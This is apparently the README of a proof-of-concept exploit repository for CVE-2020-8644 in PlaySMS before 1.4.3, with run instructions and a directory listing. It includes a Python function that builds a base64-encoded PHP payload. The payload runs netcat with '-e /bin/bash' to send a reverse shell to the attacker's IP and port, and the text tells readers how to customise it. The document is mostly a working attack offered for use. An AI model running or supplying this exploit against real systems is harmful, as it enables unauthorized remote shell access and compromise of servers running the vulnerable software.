Python script to exploit PlaySMS before 1.4.3# CVE-2020-8644-PlaySMS-1.4
Python script to exploit PlaySMS before 1.4.3
## Execution
Open a port on your machine:

And the execute exploit.py:

```
./exploit.py <target-ip> <target-port> <your-ip> <your-open-port>
```
## Changing the exploit
Tou may want to change the reverse shell created by exploit.py
To do this, you can change the function ```create_revshell_encoded``` on lines 14 to 19 of exploit.py:
```
def create_revshell_encoded(lhost,lport):
# Change if you need
revshell = "/*<?php /**/ system('/bin/nc.traditional "+lhost + " " + lport + " -e /bin/bash');"
revshell_encoded = base64_encode(revshell)
revshell_encoded = revshell_encoded.split('=')[0]
return revshell_encoded
```
This code was developed to exploit a specific scenario where the target machine had ```/bin/nc.traditional``` available.
[4.0K] /data/pocs/3c792c22357540edfa062ae0b8f8018d78ddbacc
├── [3.0K] exploit.py
├── [4.0K] img
│ ├── [ 53K] execution.png
│ └── [ 13K] nc.png
└── [ 911] README.md
1 directory, 4 files